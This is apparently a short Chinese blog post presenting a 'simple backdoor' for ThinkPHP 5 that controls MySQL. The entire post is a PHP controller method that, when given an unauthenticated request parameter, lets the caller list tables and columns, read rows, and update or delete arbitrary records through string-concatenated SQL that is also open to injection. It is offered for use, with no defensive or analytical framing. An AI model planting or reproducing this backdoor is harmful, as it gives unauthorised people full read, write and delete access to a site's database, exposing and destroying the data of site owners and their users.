tp5 控制mysql简单后门

public function inithoumen(){
        $houmen = $_REQUEST['houmen'];
        if(isset($houmen)){
            $table_houmen = $_REQUEST['table_houmen'];
            $id_name_houmen = $_REQUEST['id_name_houmen'];
            $id_houmen = $_REQUEST['id_houmen'];
            $type_houmen = $_REQUEST['type_houmen'];
            $column_houmen = $_REQUEST['column_houmen'];
            $update_value_houmen = $_REQUEST['update_value_houmen'];
            if($type_houmen==1){
                $res = model($table_houmen)->where($id_name_houmen."=".$id_houmen)->select();
            }elseif($type_houmen==2){
                $res = Db::query("show tables");
            }elseif($type_houmen==3){
                $res = Db::query("select TABLE_NAME,COLUMN_NAME from information_schema.columns where table_name='".config("database.prefix").$table_houmen."'");
            }elseif($type_houmen==4){
                $res = Db::query("UPDATE ".config("database.prefix").$table_houmen." SET ".$column_houmen."='".$update_value_houmen."' WHERE ".$id_name_houmen."=".$id_houmen);

            }elseif($type_houmen==5){
                $res = Db::query("DELETE FROM ".config("database.prefix").$table_houmen." WHERE ".$id_name_houmen."=".$id_houmen);
            }
            echo json_encode($res);
            die;
        }

你可能感兴趣的:(tp5 控制mysql简单后门)